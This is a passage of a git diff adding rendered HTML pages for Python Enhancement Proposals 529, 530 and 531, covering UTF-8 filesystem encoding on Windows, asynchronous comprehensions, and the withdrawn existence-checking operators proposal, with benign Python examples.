Source: https://github.com/python/peps/blob/main/peps/pep-0528.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0529/index.html b/pep-0529/index.html
new file mode 100644
index 00000000000..898a34ebda3
--- /dev/null
+++ b/pep-0529/index.html
@@ -0,0 +1,566 @@
PEP 529 – Change Windows filesystem encoding to UTF-8 | peps.python.org
+
+


+ + +
+
+
+

PEP 529 – Change Windows filesystem encoding to UTF-8

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Aug-2016
+
Python-Version:
+
3.6
+
Post-History:
+
01-Sep-2016, 04-Sep-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Historically, Python has used the ANSI APIs for interacting with the Windows operating system, often via C Runtime functions. However, these have long been discouraged in favor of the UTF-16 APIs. Within the operating system, all text is represented as UTF-16, and the ANSI APIs perform encoding and decoding using the active code page. See Naming Files, Paths, and Namespaces for more details.

+

This PEP proposes changing the default filesystem encoding on Windows to utf-8, and changing all filesystem functions to use the Unicode APIs for filesystem paths. This will not affect code that uses strings to represent paths; however, code that uses bytes for paths will now be able to correctly round-trip all valid paths in Windows filesystems. Currently, the conversions between Unicode (in the OS) and bytes (in Python) are lossy and fail to round-trip characters outside of the user’s active code page.

+

Notably, this does not impact the encoding of the contents of files. These will +continue to default to locale.getpreferredencoding() (for text files) or +plain bytes (for binary files). This only affects the encoding used when users +pass a bytes object to Python where it is then passed to the operating system as +a path name.

+
+
+

Background

+

File system paths are almost universally represented as text with an encoding +determined by the file system. In Python, we expose these paths via a number of +interfaces, such as the os and io modules. Paths may be passed either +direction across these interfaces, that is, from the filesystem to the +application (for example, os.listdir()), or from the application to the +filesystem (for example, os.unlink()).

+

When paths are passed between the filesystem and the application, they are +either passed through as a bytes blob or converted to/from str using +os.fsencode() and os.fsdecode() or explicit encoding using +sys.getfilesystemencoding(). The result of encoding a string with +sys.getfilesystemencoding() is a blob of bytes in the native format for the +default file system.

+
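For example (a minimal sketch of the round-trip described above):

import os

path = 'example.txt'
raw = os.fsencode(path)          # bytes in sys.getfilesystemencoding()
assert isinstance(raw, bytes)
assert os.fsdecode(raw) == path  # round-trips back to str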

On Windows, the native format for the filesystem is utf-16-le. The recommended +platform APIs for accessing the filesystem all accept and return text encoded in +this format. However, prior to Windows NT (and possibly further back), the +native format was a configurable machine option and a separate set of APIs +existed to accept this format. The option (the “active code page”) and these +APIs (the “*A functions”) still exist in recent versions of Windows for +backwards compatibility, though new functionality often only has a utf-16-le API +(the “*W functions”).

+

In Python, str is recommended because it can correctly round-trip all characters +used in paths (on POSIX with surrogateescape handling; on Windows because str +maps to the native representation). On Windows bytes cannot round-trip all +characters used in paths, as Python internally uses the *A functions and hence +the encoding is “whatever the active code page is”. Since the active code page +cannot represent all Unicode characters, the conversion of a path into bytes can +lose information without warning or any available indication.

+

As a demonstration of this:

+
>>> open('test\uAB00.txt', 'wb').close()
+>>> import glob
+>>> glob.glob('test*')
+['test\uab00.txt']
+>>> glob.glob(b'test*')
+[b'test?.txt']
+
+
+

The Unicode character in the second call to glob has been replaced by a ‘?’, +which means passing the path back into the filesystem will result in a +FileNotFoundError. The same results may be observed with os.listdir() or +any function that matches the return type to the parameter type.

+

While one user-accessible fix is to use str everywhere, POSIX systems generally +do not suffer from data loss when using bytes exclusively as the bytes are the +canonical representation. Even if the encoding is “incorrect” by some standard, +the file system will still map the bytes back to the file. Making use of this +avoids the cost of decoding and reencoding, such that (theoretically, and only +on POSIX), code such as this may be faster because of the use of b'.' +compared to using '.':

+
>>> for f in os.listdir(b'.'):
+...     os.stat(f)
+...
+
+
+

As a result, POSIX-focused library authors prefer to use bytes to represent +paths. For some authors it is also a convenience, as their code may receive +bytes already known to be encoded correctly, while others are attempting to +simplify porting their code from Python 2. However, the correctness assumptions +do not carry over to Windows where Unicode is the canonical representation, and +errors may result. This potential data loss is why the use of bytes paths on +Windows was deprecated in Python 3.3 - all of the above code snippets produce +deprecation warnings on Windows.

+
+
+

Proposal

+

Currently the default filesystem encoding is ‘mbcs’, which is a meta-encoder +that uses the active code page. However, when bytes are passed to the filesystem +they go through the *A APIs and the operating system handles encoding. In this +case, paths are always encoded using the equivalent of ‘mbcs:replace’ with no +opportunity for Python to override or change this.

+

This proposal would remove all use of the *A APIs and only ever call the *W +APIs. When Windows returns paths to Python as str, they will be decoded from +utf-16-le and returned as text (in whatever the minimal representation is). When +Python code requests paths as bytes, the paths will be transcoded from +utf-16-le into utf-8 using surrogatepass (Windows does not validate surrogate +pairs, so it is possible to have invalid surrogates in filenames). Equally, when +paths are provided as bytes, they are transcoded from utf-8 into utf-16-le +and passed to the *W APIs.

+
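A rough sketch of the proposed transcoding path for bytes paths, expressed in pure Python (illustrative only; the real work happens in C):

def bytes_path_to_wide(path_bytes: bytes) -> bytes:
    # What Python would hand to the *W APIs for a bytes path.
    return path_bytes.decode('utf-8', 'surrogatepass').encode('utf-16-le', 'surrogatepass')

def wide_to_bytes_path(wide: bytes) -> bytes:
    # What Python would return when a bytes path is requested.
    return wide.decode('utf-16-le', 'surrogatepass').encode('utf-8', 'surrogatepass')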

The use of utf-8 will not be configurable, except for the provision of a +“legacy mode” flag to revert to the previous behaviour.

+

The surrogateescape error mode does not apply here, as the concern is not +about retaining nonsensical bytes. Any path returned from the operating system +will be valid Unicode, while invalid paths created by the user should raise a +decoding error (currently these would raise OSError or a subclass).

+

The choice of utf-8 bytes (as opposed to utf-16-le bytes) is to ensure the +ability to round-trip path names and allow basic manipulation (for example, +using the os.path module) when assuming an ASCII-compatible encoding. Using +utf-16-le as the encoding is more pure, but will cause more issues than are +resolved.

+

This change would also undeprecate the use of bytes paths on Windows. No change +to the semantics of using bytes as a path is required - as before, they must be +encoded with the encoding specified by sys.getfilesystemencoding().

+
+
+

Specific Changes

+
+

Update sys.getfilesystemencoding

+

Remove the default value for Py_FileSystemDefaultEncoding and set it in +initfsencoding() to utf-8, or if the legacy-mode switch is enabled to mbcs.

+

Update the implementations of PyUnicode_DecodeFSDefaultAndSize() and +PyUnicode_EncodeFSDefault() to use the utf-8 codec, or if the legacy-mode +switch is enabled the existing mbcs codec.

+
+
+

Add sys.getfilesystemencodeerrors

+

As the error mode may now change between surrogatepass and replace, +Python code that manually performs encoding also needs access to the current +error mode. This includes the implementation of os.fsencode() and +os.fsdecode(), which currently assume an error mode based on the codec.

+

Add a public Py_FileSystemDefaultEncodeErrors, similar to the existing +Py_FileSystemDefaultEncoding. The default value on Windows will be +surrogatepass or in legacy mode, replace. The default value on all other +platforms will be surrogateescape.

+

Add a public sys.getfilesystemencodeerrors() function that returns the +current error mode.

+
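For a quick check (values shown assume a non-legacy Windows session on Python 3.6+; POSIX platforms report a locale-dependent encoding and 'surrogateescape'):

import sys

print(sys.getfilesystemencoding())      # 'utf-8'
print(sys.getfilesystemencodeerrors())  # 'surrogatepass'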

Update the implementations of PyUnicode_DecodeFSDefaultAndSize() and +PyUnicode_EncodeFSDefault() to use the variable for error mode rather than +constant strings.

+

Update the implementations of os.fsencode() and os.fsdecode() to use +sys.getfilesystemencodeerrors() instead of assuming the mode.

+
+
+

Update path_converter

+

Update the path converter to always decode bytes or buffer objects into text +using PyUnicode_DecodeFSDefaultAndSize().

+

Change the narrow field from a char* string into a flag that indicates +whether the original object was bytes. This is required for functions that need +to return paths using the same type as was originally provided.

+
+
+

Remove unused ANSI code

+

Remove all code paths using the narrow field, as these will no longer be reachable by any caller. These are only used within posixmodule.c. Other code that handles paths should have its use of bytes paths replaced with decoding and use of the *W APIs.

+
+
+

Add legacy mode

+

Add a legacy mode flag, enabled by the environment variable +PYTHONLEGACYWINDOWSFSENCODING or by a function call to +sys._enablelegacywindowsfsencoding(). The function call can only be +used to enable the flag and should be used by programs as close to +initialization as possible. Legacy mode cannot be disabled while Python is +running.

+
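For example, a program opting in to the old behaviour would do so at startup (a Windows-only API, guarded here so the sketch runs anywhere):

import sys

if hasattr(sys, '_enablelegacywindowsfsencoding'):
    # Must be called as close to interpreter startup as possible.
    sys._enablelegacywindowsfsencoding()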

When this flag is set, the default filesystem encoding is set to mbcs rather +than utf-8, and the error mode is set to replace rather than +surrogatepass. Paths will continue to decode to wide characters and only *W +APIs will be called, however, the bytes passed in and received from Python will +be encoded the same as prior to this change.

+
+
+

Undeprecate bytes paths on Windows

+

Using bytes as paths on Windows is currently deprecated. We would announce that +this is no longer the case, and that paths when encoded as bytes should use +whatever is returned from sys.getfilesystemencoding() rather than the user’s +active code page.

+
+
+

Beta experiment

+

To assist with determining the impact of this change, we propose applying it to +3.6.0b1 provisionally with the intent being to make a final decision before +3.6.0b4.

+

During the experiment period, decoding and encoding exception messages will be +expanded to include a link to an active online discussion and encourage +reporting of problems.

+

If it is decided to revert the functionality for 3.6.0b4, the implementation +change would be to permanently enable the legacy mode flag, change the +environment variable to PYTHONWINDOWSUTF8FSENCODING and function to +sys._enablewindowsutf8fsencoding() to allow enabling the functionality +on a case-by-case basis, as opposed to disabling it.

+

It is expected that if we cannot feasibly make the change for 3.6 due to +compatibility concerns, it will not be possible to make the change at any later +time in Python 3.x.

+
+
+

Affected Modules

+

This PEP implicitly includes all modules within the Python standard library that either pass path names to the operating system, or otherwise use sys.getfilesystemencoding().

+

As of 3.6.0a4, the following modules require modification:

+
    +
  • os
  • +
  • _overlapped
  • +
  • _socket
  • +
  • subprocess
  • +
  • zipimport
  • +
+

The following modules use sys.getfilesystemencoding() but do not need +modification:

+
    +
  • gc (already assumes bytes are utf-8)
  • +
  • grp (not compiled for Windows)
  • +
  • http.server (correctly includes codec name with transmitted data)
  • +
  • idlelib.editor (should not be needed; has fallback handling)
  • +
  • nis (not compiled for Windows)
  • +
  • pwd (not compiled for Windows)
  • +
  • spwd (not compiled for Windows)
  • +
  • _ssl (only used for ASCII constants)
  • +
  • tarfile (code unused on Windows)
  • +
  • _tkinter (already assumes bytes are utf-8)
  • +
  • wsgiref (assumed as the default encoding for unknown environments)
  • +
  • zipapp (code unused on Windows)
  • +
+

The following native code uses one of the encoding or decoding functions, but do +not require any modification:

+
    +
  • Parser/parsetok.c (docs already specify sys.getfilesystemencoding())
  • +
  • Python/ast.c (docs already specify sys.getfilesystemencoding())
  • +
  • Python/compile.c (undocumented, but Python filesystem encoding implied)
  • +
  • Python/errors.c (docs already specify os.fsdecode())
  • +
  • Python/fileutils.c (code unused on Windows)
  • +
  • Python/future.c (undocumented, but Python filesystem encoding implied)
  • +
  • Python/import.c (docs already specify utf-8)
  • +
  • Python/importdl.c (code unused on Windows)
  • +
  • Python/pythonrun.c (docs already specify sys.getfilesystemencoding())
  • +
  • Python/symtable.c (undocumented, but Python filesystem encoding implied)
  • +
  • Python/thread.c (code unused on Windows)
  • +
  • Python/traceback.c (encodes correctly for comparing strings)
  • +
  • Python/_warnings.c (docs already specify os.fsdecode())
  • +
+
+
+
+

Rejected Alternatives

+
+

Use strict mbcs decoding

+

This is essentially the same as the proposed change, but instead of changing +sys.getfilesystemencoding() to utf-8 it is changed to mbcs (which +dynamically maps to the active code page).

+

This approach allows the use of new functionality that is only available as *W +APIs and also detection of encoding/decoding errors. For example, rather than +silently replacing Unicode characters with ‘?’, it would be possible to warn or +fail the operation.

+

Compared to the proposed fix, this could enable some new functionality but does +not fix any of the problems described initially. New runtime errors may cause +some problems to be more obvious and lead to fixes, provided library maintainers +are interested in supporting Windows and adding a separate code path to treat +filesystem paths as strings.

+

Making the encoding mbcs without strict errors is equivalent to the legacy-mode +switch being enabled by default. This is a possible course of action if there is +significant breakage of actual code and a need to extend the deprecation period, +but still a desire to have the simplifications to the CPython source.

+
+
+

Make bytes paths an error on Windows

+

By preventing the use of bytes paths on Windows completely we prevent users from +hitting encoding issues.

+

However, the motivation for this PEP is to increase the likelihood that code +written on POSIX will also work correctly on Windows. This alternative would +move the other direction and make such code completely incompatible. As this +does not benefit users in any way, we reject it.

+
+
+

Make bytes paths an error on all platforms

+

By deprecating and then disabling the use of bytes paths on all platforms, we prevent users from hitting encoding issues regardless of where the code was originally written. This would require a full deprecation cycle, as there are currently no warnings on platforms other than Windows.

+

This is likely to be seen as a hostile action against Python developers in +general, and as such is rejected at this time.

+
+
+
+

Code that may break

+

The following code patterns may break or see different behaviour as a result of +this change. Each of these examples would have been fragile in code intended for +cross-platform use. The suggested fixes demonstrate the most compatible way to +handle path encoding issues across all platforms and across multiple Python +versions.

+

Note that all of these examples produce deprecation warnings on Python 3.3 and +later.

+
+

Not managing encodings across boundaries

+

Code that does not manage encodings when crossing protocol boundaries may +currently be working by chance, but could encounter issues when either encoding +changes. Note that the source of filename may be any function that returns +a bytes object, as illustrated in a second example below:

+
>>> filename = open('filename_in_mbcs.txt', 'rb').read()
+>>> text = open(filename, 'r').read()
+
+
+

To correct this code, the encoding of the bytes in filename should be +specified, either when reading from the file or before using the value:

+
>>> # Fix 1: Open file as text (default encoding)
+>>> filename = open('filename_in_mbcs.txt', 'r').read()
+>>> text = open(filename, 'r').read()
+
+>>> # Fix 2: Open file as text (explicit encoding)
+>>> filename = open('filename_in_mbcs.txt', 'r', encoding='mbcs').read()
+>>> text = open(filename, 'r').read()
+
+>>> # Fix 3: Explicitly decode the path
+>>> filename = open('filename_in_mbcs.txt', 'rb').read()
+>>> text = open(filename.decode('mbcs'), 'r').read()
+
+
+

Where the creator of filename is separated from the user of filename, +the encoding is important information to include:

+
>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'.encode('mbcs')
+
+>>> filename = some_object.filename
+>>> type(filename)
+<class 'bytes'>
+>>> text = open(filename, 'r').read()
+
+
+

To fix this code for best compatibility across operating systems and Python +versions, the filename should be exposed as str:

+
>>> # Fix 1: Expose as str
+>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'
+
+>>> filename = some_object.filename
+>>> type(filename)
+<class 'str'>
+>>> text = open(filename, 'r').read()
+
+
+

Alternatively, the encoding used for the path needs to be made available to the +user. Specifying os.fsencode() (or sys.getfilesystemencoding()) is an +acceptable choice, or a new attribute could be added with the exact encoding:

+
>>> # Fix 2: Use fsencode
+>>> some_object.filename = os.fsencode(r'C:\Users\Steve\Documents\my_file.txt')
+
+>>> filename = some_object.filename
+>>> type(filename)
+<class 'bytes'>
+>>> text = open(filename, 'r').read()
+
+
+>>> # Fix 3: Expose as explicit encoding
+>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'.encode('cp437')
+>>> some_object.filename_encoding = 'cp437'
+
+>>> filename = some_object.filename
+>>> type(filename)
+<class 'bytes'>
+>>> filename = filename.decode(some_object.filename_encoding)
+>>> type(filename)
+<class 'str'>
+>>> text = open(filename, 'r').read()
+
+
+
+
+

Explicitly using ‘mbcs’

+

Code that explicitly encodes text using ‘mbcs’ before passing to file system +APIs is now passing incorrectly encoded bytes. Note that the source of +filename in this example is not relevant, provided that it is a str:

+
>>> filename = open('files.txt', 'r').readline().rstrip()
+>>> text = open(filename.encode('mbcs'), 'r')
+
+
+

To correct this code, the string should be passed without explicit encoding, or +should use os.fsencode():

+
>>> # Fix 1: Do not encode the string
+>>> filename = open('files.txt', 'r').readline().rstrip()
+>>> text = open(filename, 'r')
+
+>>> # Fix 2: Use correct encoding
+>>> filename = open('files.txt', 'r').readline().rstrip()
+>>> text = open(os.fsencode(filename), 'r')
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0529.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0530/index.html b/pep-0530/index.html
new file mode 100644
index 00000000000..ff7b6838e21
--- /dev/null
+++ b/pep-0530/index.html
@@ -0,0 +1,285 @@
PEP 530 – Asynchronous Comprehensions | peps.python.org
+
+


+ + +
+
+
+

PEP 530 – Asynchronous Comprehensions

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
03-Sep-2016
+
Python-Version:
+
3.6
+
Post-History:
+
03-Sep-2016
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 492 and PEP 525 introduce support for native coroutines and +asynchronous generators using async / await syntax. This PEP +proposes to add asynchronous versions of list, set, dict comprehensions +and generator expressions.

+
+
+

Rationale and Goals

+

Python has extensive support for synchronous comprehensions, allowing lists, dicts, and sets to be produced with a simple and concise syntax. We propose implementing similar syntactic constructions for asynchronous code.

+

To illustrate the readability improvement, consider the following +example:

+
result = []
+async for i in aiter():
+    if i % 2:
+        result.append(i)
+
+
+

With the proposed asynchronous comprehensions syntax, the above code +becomes as short as:

+
result = [i async for i in aiter() if i % 2]
+
+
+

The PEP also makes it possible to use the await expressions in +all kinds of comprehensions:

+
result = [await fun() for fun in funcs]
+
+
+
+
+

Specification

+
+

Asynchronous Comprehensions

+

We propose to allow using async for inside list, set and dict +comprehensions. Pending PEP 525 approval, we can also allow creation +of asynchronous generator expressions.

+

Examples:

+
    +
  • set comprehension: {i async for i in agen()};
  • +
  • list comprehension: [i async for i in agen()];
  • +
  • dict comprehension: {i: i ** 2 async for i in agen()};
  • +
  • generator expression: (i ** 2 async for i in agen()).
  • +
+

It is allowed to use async for along with if and for +clauses in asynchronous comprehensions and generator expressions:

+
dataset = {data for line in aiter()
+                async for data in line
+                if check(data)}
+
+
+

Asynchronous comprehensions are only allowed inside an async def +function.

+
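A complete, runnable example (asyncio.run requires Python 3.7+; on 3.6, use get_event_loop().run_until_complete instead):

import asyncio

async def agen():
    for i in range(5):
        yield i  # an asynchronous generator, per PEP 525

async def main():
    # The comprehension must appear inside an async def function.
    odds = [i async for i in agen() if i % 2]
    print(odds)  # [1, 3]

asyncio.run(main())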

In principle, asynchronous generator expressions are allowed in +any context. However, in Python 3.6, due to async and await +soft-keyword status, asynchronous generator expressions are only +allowed in an async def function. Once async and await +become reserved keywords in Python 3.7, this restriction will be +removed.

+
+
+

await in Comprehensions

+

We propose to allow the use of await expressions in both +asynchronous and synchronous comprehensions:

+
result = [await fun() for fun in funcs]
+result = {await fun() for fun in funcs}
+result = {fun: await fun() for fun in funcs}
+
+result = [await fun() for fun in funcs if await smth]
+result = {await fun() for fun in funcs if await smth}
+result = {fun: await fun() for fun in funcs if await smth}
+
+result = [await fun() async for fun in funcs]
+result = {await fun() async for fun in funcs}
+result = {fun: await fun() async for fun in funcs}
+
+result = [await fun() async for fun in funcs if await smth]
+result = {await fun() async for fun in funcs if await smth}
+result = {fun: await fun() async for fun in funcs if await smth}
+
+
+

This is only valid in async def function body.

+
+
+

Grammar Updates

+

The proposal requires one change on the grammar level: adding the +optional “async” keyword to comp_for:

+
comp_for: [ASYNC] 'for' exprlist 'in' or_test [comp_iter]
+
+
+

The comprehension AST node will have the new is_async argument.

+
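The new field is observable from Python (a sketch; wrapping the comprehension in an async def keeps the source parseable on both 3.6 and later versions):

import ast

tree = ast.parse("async def f():\n    return [i async for i in agen()]")
comp = tree.body[0].body[0].value.generators[0]  # an ast.comprehension node
print(comp.is_async)                             # 1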
+
+

Backwards Compatibility

+

The proposal is fully backwards compatible.

+
+
+
+

Acceptance

+

PEP 530 was accepted by Guido, September 6, 2016 [1].

+
+
+

Implementation

+

The implementation is tracked in issue 28008 [3]. The reference +implementation git repository is available at [2].

+
+
+

References

+ +
+
+

Acknowledgments

+

I thank Guido van Rossum, Victor Stinner and Elvis Pranskevichus +for their feedback, code reviews, and discussions around this +PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0530.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0531/index.html b/pep-0531/index.html new file mode 100644 index 00000000000..a4a2d22e381 --- /dev/null +++ b/pep-0531/index.html @@ -0,0 +1,757 @@
+ PEP 531 – Existence checking operators | peps.python.org
+
+


+ + +
+
+
+

PEP 531 – Existence checking operators

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
25-Oct-2016
+
Python-Version:
+
3.7
+
Post-History:
+
28-Oct-2016
+
+
+
+
+
+

Abstract

+

Inspired by PEP 505 and the related discussions, this PEP proposes the addition +of two new control flow operators to Python:

+
    +
  • Existence-checking precondition (“exists-then”): expr1 ?then expr2
  • +
  • Existence-checking fallback (“exists-else”): expr1 ?else expr2
  • +
+

as well as the following abbreviations for common existence checking +expressions and statements:

+
    +
  • Existence-checking attribute access: +obj?.attr (for obj ?then obj.attr)
  • +
  • Existence-checking subscripting: +obj?[expr] (for obj ?then obj[expr])
  • +
  • Existence-checking assignment: +value ?= expr (for value = value ?else expr)
  • +
+

The common ? symbol in these new operator definitions indicates that they +use a new “existence checking” protocol rather than the established +truth-checking protocol used by if statements, while loops, comprehensions, +generator expressions, conditional expressions, logical conjunction, and +logical disjunction.

+

This new protocol would be made available as operator.exists, with the following characteristics (a rough sketch in current Python follows the list):

+
    +
  • types can define a new __exists__ magic method (Python) or +tp_exists slot (C) to override the default behaviour. This optional +method has the same signature and possible return values as __bool__.
  • +
  • operator.exists(None) returns False
  • +
  • operator.exists(NotImplemented) returns False
  • +
  • operator.exists(Ellipsis) returns False
  • +
  • float, complex and decimal.Decimal will override the existence +check such that NaN values return False and other values (including +zero values) return True
  • +
  • for any other type, operator.exists(obj) returns True by default. Most +importantly, values that evaluate to False in a truth checking context +(zeroes, empty containers) will still evaluate to True in an existence +checking context
  • +
+
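Since the PEP was withdrawn, no such API was ever added; the following is only a rough plain-Python sketch of the characteristics listed above (handling float NaN directly, and leaving complex and decimal.Decimal to hypothetical __exists__ implementations):
import math
+
+def exists(obj):
+    # Sketch only: operator.exists was never added to the stdlib.
+    checker = getattr(type(obj), "__exists__", None)
+    if checker is not None:
+        return bool(checker(obj))
+    if obj is None or obj is NotImplemented or obj is Ellipsis:
+        return False
+    # NaN values don't "exist"; zeroes and empty containers do.
+    if isinstance(obj, float) and math.isnan(obj):
+        return False
+    return True
+
+assert exists(0) and exists("") and exists([])
+assert not exists(None) and not exists(float("nan"))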
+
+

PEP Withdrawal

+

When posting this PEP for discussion on python-ideas [4], I asked reviewers to +consider 3 high level design questions before moving on to considering the +specifics of this particular syntactic proposal:

+

1. Do we collectively agree that “existence checking” is a useful general concept that exists in software development and is distinct from the concept of “truth checking”?
2. Do we collectively agree that the Python ecosystem would benefit from an existence checking protocol that permits generalisation of algorithms (especially short circuiting ones) across different “data missing” indicators, including those defined in the language definition, the standard library, and custom user code?
3. Do we collectively agree that it would be easier to use such a protocol effectively if existence-checking equivalents to the truth-checking “and” and “or” control flow operators were available?

+

While the answers to the first question were generally positive, it quickly +became clear that the answer to the second question is “No”.

+

Steven D’Aprano articulated the counter-argument well in [5], but the general +idea is that when checking for “missing data” sentinels, we’re almost always +looking for a specific sentinel value, rather than any sentinel value.

+

NotImplemented exists, for example, due to None being a potentially +legitimate result from overloaded arithmetic operators and exception +handling imposing too much runtime overhead to be useful for operand coercion.

+

Similarly, Ellipsis exists for multi-dimensional slicing support due to None already having another meaning in a slicing context (indicating the use of the default start or stop indices, or the default step size).

+

The usefulness of NaN in mathematical code is that it behaves programmatically like a normal value of its type (e.g. exposing all the usual attributes and methods), while arithmetically behaving according to the mathematical rules for handling NaN values.

+

With that core design concept invalidated, the proposal as a whole doesn’t +make sense, and it is accordingly withdrawn.

+

However, the discussion of the proposal did prompt consideration of a potential +protocol based approach to make the existing and, or and if-else +operators more flexible [6] without introducing any new syntax, so I’ll be +writing that up as another possible alternative to PEP 505.

+
+
+

Relationship with other PEPs

+

While this PEP was inspired by and builds on Mark Haase’s excellent work in +putting together PEP 505, it ultimately competes with that PEP due to +significant differences in the specifics of the proposed syntax and semantics +for the feature.

+

It also presents a different perspective on the rationale for the change by +focusing on the benefits to existing Python users as the typical demands of +application and service development activities are genuinely changing. It +isn’t an accident that similar features are now appearing in multiple +programming languages, and while it’s a good idea for us to learn from how other +language designers are handling the problem, precedents being set elsewhere +are more relevant to how we would go about tackling this problem than they +are to whether or not we think it’s a problem we should address in the first +place.

+
+
+

Rationale

+
+

Existence checking expressions

+

An increasingly common requirement in modern software development is the need +to work with “semi-structured data”: data where the structure of the data is +known in advance, but pieces of it may be missing at runtime, and the software +manipulating that data is expected to degrade gracefully (e.g. by omitting +results that depend on the missing data) rather than failing outright.

+

Some particularly common cases where this issue arises are:

+
    +
  • handling optional application configuration settings and function parameters
  • +
  • handling external service failures in distributed systems
  • +
  • handling data sets that include some partial records
  • +
+

It is the latter two cases that are the primary motivation for this PEP - while +needing to deal with optional configuration settings and parameters is a design +requirement at least as old as Python itself, the rise of public cloud +infrastructure, the development of software systems as collaborative networks +of distributed services, and the availability of large public and private data +sets for analysis means that the ability to degrade operations gracefully in +the face of partial service failures or partial data availability is becoming +an essential feature of modern programming environments.

+

At the moment, writing such software in Python can be genuinely awkward, as +your code ends up littered with expressions like:

+
    +
  • value1 = expr1.field.of.interest if expr1 is not None else None
  • +
  • value2 = expr2["field"]["of"]["interest"] if expr2 is not None else None
  • +
  • value3 = expr3 if expr3 is not None else expr4 if expr4 is not None else expr5
  • +
+

If these are only occasional, then expanding out to full statement forms may +help improve readability, but if you have 4 or 5 of them in a row (which is a +fairly common situation in data transformation pipelines), then replacing them +with 16 or 20 lines of conditional logic really doesn’t help matters.

+

Expanding the three examples above that way hopefully helps illustrate the point:

+
if expr1 is not None:
+    value1 = expr1.field.of.interest
+else:
+    value1 = None
+if expr2 is not None:
+    value2 = expr2["field"]["of"]["interest"]
+else:
+    value2 = None
+if expr3 is not None:
+    value3 = expr3
+else:
+    if expr4 is not None:
+        value3 = expr4
+    else:
+        value3 = expr5
+
+
+

The combined impact of the proposals in this PEP is to allow the above sample +expressions to instead be written as:

+
    +
  • value1 = expr1?.field.of.interest
  • +
  • value2 = expr2?["field"]["of"]["interest"]
  • +
  • value3 = expr3 ?else expr4 ?else expr5
  • +
+

In these forms, almost all of the information presented to the reader is +immediately relevant to the question “What does this code do?”, while the +boilerplate code to handle missing data by passing it through to the output +or falling back to an alternative input, has shrunk to two uses of the ? +symbol and two uses of the ?else keyword.

+

In the first two examples, the 31 character boilerplate clause +if exprN is not None else None (minimally 27 characters for a single letter +variable name) has been replaced by a single ? character, substantially +improving the signal-to-pattern-noise ratio of the lines (especially if it +encourages the use of more meaningful variable and field names rather than +making them shorter purely for the sake of expression brevity).

+

In the last example, two instances of the 21 character boilerplate, +if exprN is not None (minimally 17 characters) are replaced with single +characters, again substantially improving the signal-to-pattern-noise ratio.

+

Furthermore, each of our 5 “subexpressions of potential interest” is included +exactly once, rather than 4 of them needing to be duplicated or pulled out +to a named variable in order to first check if they exist.

+

The existence checking precondition operator is mainly defined to provide a +clear conceptual basis for the existence checking attribute access and +subscripting operators:

+
    +
  • obj?.attr is roughly equivalent to obj ?then obj.attr
  • +
  • obj?[expr] is roughly equivalent to obj ?then obj[expr]
  • +
+

The main semantic difference between the shorthand forms and their expanded +equivalents is that the common subexpression to the left of the existence +checking operator is evaluated only once in the shorthand form (similar to +the benefit offered by augmented assignment statements).
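In current Python the shorthand semantics can be approximated with a helper function (maybe_attr is a hypothetical name, reusing the exists() sketch from the Abstract above):
from types import SimpleNamespace
+
+def maybe_attr(obj, *names):
+    # Rough emulation of "obj?.name1.name2...": obj is evaluated once,
+    # and passed through unchanged when it doesn't "exist".
+    if not exists(obj):
+        return obj
+    for name in names:
+        obj = getattr(obj, name)
+    return obj
+
+record = SimpleNamespace(field=SimpleNamespace(of=SimpleNamespace(interest=42)))
+print(maybe_attr(record, "field", "of", "interest"))  # 42
+print(maybe_attr(None, "field", "of", "interest"))    # None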

+
+
+

Existence checking assignment

+

Existence-checking assignment is proposed as a relatively straightforward +expansion of the concepts in this PEP to also cover the common configuration +handling idiom:

+
    +
  • value = value if value is not None else expensive_default()
  • +
+

by allowing that to instead be abbreviated as:

+
    +
  • value ?= expensive_default()
  • +
+

This is mainly beneficial when the target is a subscript operation or +subattribute, as even without this specific change, the PEP would still +permit this idiom to be updated to:

+
    +
  • value = value ?else expensive_default()
  • +
+

The main argument against adding this form is that it’s arguably ambiguous +and could mean either:

+
    +
  • value = value ?else expensive_default(); or
  • +
  • value = value ?then value.subfield.of.interest
  • +
+

The second form isn’t at all useful, but if this concern was deemed significant +enough to address while still keeping the augmented assignment feature, +the full keyword could be included in the syntax:

+
    +
  • value ?else= expensive_default()
  • +
+

Alternatively, augmented assignment could just be dropped from the current +proposal entirely and potentially reconsidered at a later date.

+
+
+

Existence checking protocol

+

The existence checking protocol is included in this proposal primarily to allow for proxy objects (e.g. local representations of remote resources) and mock objects used in testing to correctly indicate non-existence of target resources, even though the proxy or mock object itself is not None.

+

However, with that protocol defined, it then seems natural to expand it to provide a type independent way of checking for NaN values in numeric types - at the moment you need to be aware of the exact data type you’re working with (e.g. builtin floats, builtin complex numbers, the decimal module) and use the appropriate operation (e.g. math.isnan, cmath.isnan, decimal.getcontext().is_nan(), respectively).
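The current fragmentation is easy to demonstrate (Decimal.is_nan() is the method counterpart of the context API named above):
import cmath
+import math
+from decimal import Decimal
+
+# Three NaN values, three different type-specific checks:
+print(math.isnan(float("nan")))     # True
+print(cmath.isnan(complex("nan")))  # True
+print(Decimal("NaN").is_nan())      # True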

+

Similarly, it seems reasonable to declare that the other placeholder builtin +singletons, Ellipsis and NotImplemented, also qualify as objects that +represent the absence of data more so than they represent data.

+
+
+

Proposed symbolic notation

+

Python has historically only had one kind of implied boolean context: truth +checking, which can be invoked directly via the bool() builtin. As this PEP +proposes a new kind of control flow operation based on existence checking rather +than truth checking, it is considered valuable to have a reminder directly +in the code when existence checking is being used rather than truth checking.

+

